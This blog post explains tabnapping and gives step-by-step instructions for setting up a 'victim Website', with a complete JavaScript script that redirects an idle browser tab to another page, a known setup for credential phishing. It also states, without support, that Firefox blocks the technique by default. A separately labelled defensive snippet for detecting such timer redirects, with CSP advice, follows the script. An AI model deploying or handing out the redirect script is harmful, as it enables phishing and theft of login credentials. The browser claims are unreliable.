Introduction to Tabnapping | blog.hackshade.com

When phishing became outdated, many other techniques evolved for hacking into Internet credentials. Here is one of them, called Tabnapping.

Tabnapping is a term coined by Mr. Aza Raskin in 2010, when he was a security researcher and design expert at Mozilla Firefox. He wrote a small piece of JavaScript that can automatically redirect a visitor's page to another page by detecting their browsing behaviour. The script does not affect the design or look of the existing page in any way; it just redirects one page to another after tracking the user's behaviour on that tab in their web browser.

The code tracks whether the user is still using the tab by detecting scrolling and click activity on the page in the current browser tab. When a tab carrying this code remains open but idle for a defined time, it automatically redirects. This threat can affect businessmen and other important people who like to browse in multiple tabs while they work.

This is another loophole for hackers and attackers, who can use XSS (Cross-Site Scripting) or a similar technique to place a chunk of script in the target web page and make it work on their demand. However, the code does not work in Firefox, because the Mozilla Firefox web browser not only detects phishing pages and the tabnapping script by default, but also makes the user on that tab aware of it.

It does work with Google Chrome.


Finally, coming to the application: just follow the steps below and test your cyber-security skills!

Requirements:-

  1. Computer / Laptop.
  2. Basic Javascript Knowledge.
  3. Website Hosting.

 

Steps:-

  1. Open Notepad++
  2. Design or Code your victim Website.
  3. Insert this JavaScript code in your web page, inside the <body></body> tag.
  4. Edit this code a little (redirection website URL and timing of redirection).
  5. Host the website on your server.

 

JAVASCRIPT CODE:-

<script type="text/javascript">
var xScroll, yScroll, timerPoll, timerRedirect, timerClock;
function initRedirect(){
  if (typeof document.body.scrollTop != "undefined"){ //IE,NS7,Moz
    xScroll = document.body.scrollLeft;
    yScroll = document.body.scrollTop;
    clearInterval(timerPoll); //stop polling scroll move
    clearInterval(timerRedirect); //stop timed redirect
    timerPoll = setInterval("pollActivity()",1); //poll scrolling
    timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect
  }
  else if (typeof window.pageYOffset != "undefined"){ //other browsers that support pageYOffset/pageXOffset instead
    xScroll = window.pageXOffset;
    yScroll = window.pageYOffset;
    clearInterval(timerPoll); //stop polling scroll move
    clearInterval(timerRedirect); //stop timed redirect
    timerPoll = setInterval("pollActivity()",1); //poll scrolling
    timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect
  }
  //else do nothing
}
function pollActivity(){
  if ((typeof document.body.scrollTop != "undefined" && (xScroll!=document.body.scrollLeft || yScroll!=document.body.scrollTop)) //IE/NS7/Moz
   ||
   (typeof window.pageYOffset != "undefined" && (xScroll!=window.pageXOffset || yScroll!=window.pageYOffset))) { //other browsers
      initRedirect(); //reset polling scroll position
  }
}
document.onmousemove=initRedirect;
document.onclick=initRedirect;
document.onkeydown=initRedirect;
window.onload=initRedirect;
window.onresize=initRedirect;
</script>
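
For anyone auditing pages for this behaviour, here is an added example (not code from the original post): a static check, runnable in Node.js, that flags inline scripts which navigate away on a timer and records whether input handlers are present to reset it. The function names, the two sample pages and the example.invalid URL are constructed for illustration.

```javascript
// Added example: flag inline scripts that navigate away from the page on a timer.
const TIMER = /\bset(?:Interval|Timeout)\s*\(/g;
const NAV_SINK = /\blocation(?:\.href)?\s*=(?!=)|\blocation\.(?:assign|replace)\s*\(/;
const ACTIVITY = /\bon(?:mousemove|click|keydown|scroll|resize)\s*=|addEventListener\s*\(\s*['"](?:mousemove|click|keydown|scroll)['"]/;
// Bodies of inline <script> elements (external src= scripts are skipped).
function inlineScripts(html) {
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  return [...html.matchAll(re)].filter(m => !/\bsrc\s*=/i.test(m[1])).map(m => m[2]);
}

// Text of a call's argument list, given the index just past its "(".
function callArgs(src, start) {
  let depth = 1, quote = null, i = start;
  for (; i < src.length && depth > 0; i++) {
    const c = src[i];
    if (quote) { if (c === "\\") i++; else if (c === quote) quote = null; }
    else if (c === '"' || c === "'" || c === "`") quote = c;
    else if (c === "(") depth++;
    else if (c === ")") depth--;
  }
  return src.slice(start, i - 1);
}

function findIdleRedirects(html) {
  const findings = [];
  for (const src of inlineScripts(html)) {
    for (const m of src.matchAll(TIMER)) {
      const args = callArgs(src, m.index + m[0].length);
      if (!NAV_SINK.test(args)) continue; // this timer does not navigate
      const delay = /,\s*(\d+)\s*$/.exec(args);
      findings.push({
        delayMs: delay ? Number(delay[1]) : null,
        stringCallback: /^\s*["'`]/.test(args), // eval-like; CSP blocks it without 'unsafe-eval'
        resetOnActivity: ACTIVITY.test(src),    // input event handlers assigned in the same script
      });
    }
  }
  return findings;
}

// Constructed samples: one page with the pattern, one benign page.
const SUSPECT = `<body><script>
var t; function arm(){ clearInterval(t);
  t = setInterval("location.href='https://example.invalid/'", 10000); }
document.onmousemove = arm; document.onkeydown = arm; window.onload = arm;
</script></body>`;
const BENIGN = `<script src="/app.js"></script><script>
setInterval(function(){ document.title = new Date().toString(); }, 1000);
</script>`;
```

A finding with both `stringCallback` and `resetOnActivity` set matches the shape of the script shown above; a Content-Security-Policy without 'unsafe-inline' and 'unsafe-eval' in script-src stops an injected copy of it from running.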

 


NOTE:-
THIS DEMONSTRATION IS ONLY FOR EDUCATIONAL PURPOSE, HACKSHADE BLOG IS NOT
LIABLE TO ANY ILLEGAL ACTIVITY PERFORMED BY VIEWERS.
“We promote curiosity but not with malicious intentions”

 
